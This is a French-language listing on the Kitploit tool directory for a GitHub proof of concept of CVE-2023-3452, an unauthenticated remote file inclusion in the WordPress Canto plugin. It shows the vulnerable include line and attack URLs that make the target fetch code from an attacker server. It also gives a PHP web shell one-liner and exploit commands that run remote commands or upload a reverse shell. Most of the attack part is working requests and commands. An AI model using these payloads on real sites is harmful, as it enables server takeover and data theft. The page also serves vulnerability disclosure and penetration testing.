Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-3452-PoC — Plugin WordPress Canto < 3.0.5 - Inclusion de fichier distant (RFI) et exécution de code à distance (RCE) | Kitploit
Outils/GitHubGitHub/leoanggal1/cve-2023-3452-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubleoanggal1/cve-2023-3452-poc

CVE-2023-3452-PoC

Plugin WordPress Canto < 3.0.5 - Inclusion de fichier distant (RFI) et exécution de code à distance (RCE)

Voir le dépôt
171il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-3452-PoC - Plugin Wordpress Canto < 3.0.5 - Inclusion de fichier distant (RFI) - Exécution de code à distance (RCE) - Non authentifié

Nous expliquons ici un PoC de la dernière vulnérabilité RFI (Inclusion de fichier distant) du plugin Wordpress Canto, et nous avons développé un exploit pour automatiser l'exécution de commandes.

« Le plugin Canto pour WordPress est vulnérable à l'inclusion de fichier distant (Remote File Inclusion) dans les versions jusqu'à la 3.0.4 incluse, via le paramètre 'wp_abspath'. Cela permet à des attaquants non authentifiés d'inclure et d'exécuter du code arbitraire à distance sur le serveur, à condition que allow_url_include soit activé. L'inclusion de fichier local (Local File Inclusion) est également possible, bien que moins utile car elle nécessite que l'attaquant soit en mesure de téléverser un fichier php malveillant via FTP ou un autre moyen dans un répertoire lisible par le serveur web. » (https://nvd.nist.gov/vuln/detail/CVE-2023-3452)

Cet exploit exploite un bug dans le paramètre wp_abspath, comme on peut le voir dans la ligne de code suivante includes/lib/download.php :

root@kitploit:~
...

require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php');

...

Pour exploiter cette vulnérabilité, il est également nécessaire que le paramètre allow_url_include=On soit activé dans la configuration php.

Il est possible d'envoyer des requêtes avec ce paramètre pointant vers notre serveur web, à partir duquel le code php sera interprété. Par exemple, si nous envoyons la requête suivante, nous pouvons vérifier que nous recevons la requête sur notre serveur :

root@kitploit:~
http://192.168.1.142/wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http://192.168.1.33:8080

image

Nous voyons que le serveur appelle le fichier /wp-admin/admin.php. Ainsi, si nous créons le répertoire et ajoutons notre code php malveillant dans le fichier admin.php, le serveur vulnérable le télécharge et l'exécute correctement. Par exemple, si nous écrivons dans notre fichier admin.php un web-shell php <?php system($_GET['cmd']); ?>, nous pouvons exécuter du code à distance.

root@kitploit:~
http://192.168.1.142/wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http://192.168.1.33:8080&cmd=whoami

image

Tout cela a été automatisé dans l'exploit python : CVE-2023-3452.py

Utilisation de l'exploit

  • Exécution d'une commande à distance :
root@kitploit:~
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -c 'id'

image

  • Téléversement du Pentesmonkey Reverse Shell :
root@kitploit:~
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -NC_PORT 3333 -s php-reverse-shell.php

image

Références

  • https://nvd.nist.gov/vuln/detail/CVE-2023-3452
  • https://wordpress.com/es/plugins/canto

Contact

  • Email: [email protected]
  • LinkedIn: Leopoldo Angulo Gallego
Télécharger l’outil